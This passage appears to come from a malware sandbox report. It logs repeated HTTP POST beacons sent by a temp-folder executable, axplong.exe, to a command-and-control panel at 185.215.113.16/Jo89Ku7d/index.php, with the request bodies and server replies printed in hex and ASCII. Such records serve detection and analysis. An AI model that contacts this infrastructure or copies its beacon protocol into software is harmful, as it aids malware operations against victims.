                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:57.528932095 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  49192.168.2.449786185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:57.650799036 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:58.363142014 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:58.365860939 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:58.592608929 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  50192.168.2.449787185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:58.710846901 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:59.428801060 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:59.430684090 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:59.664016008 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  51192.168.2.449788185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:59.773771048 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:00.618294001 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:54:00.621315956 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:00.930186987 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  52192.168.2.449789185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:01.038297892 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:01.728437901 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:54:01.729393959 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:02.052531004 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  53192.168.2.449790185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:02.165822983 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:02.879602909 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:54:02.880328894 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:03.111944914 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  54192.168.2.449791185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:03.241442919 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:03.946463108 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  55192.168.2.449792185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:03.956876040 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:04.670373917 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  56192.168.2.449793185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:04.790996075 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:05.507045031 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  57192.168.2.449794185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:05.516211033 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:06.230865955 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  58192.168.2.449795185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:06.463928938 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:07.232636929 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  59192.168.2.449796185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:07.253556013 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:07.959005117 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  60192.168.2.449797185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:08.157119989 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:08.846200943 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  61192.168.2.449798185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:08.855289936 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:09.563009977 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  62192.168.2.449799185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:09.681993008 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:10.409481049 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  63192.168.2.449800185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:10.420419931 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:11.119775057 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  64192.168.2.449801185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:11.248302937 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:12.031104088 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  65192.168.2.449802185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:12.040210962 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  66192.168.2.449803185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:54:12.166439056 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:12.885569096 CEST219INHTTP/1.1 200 OK
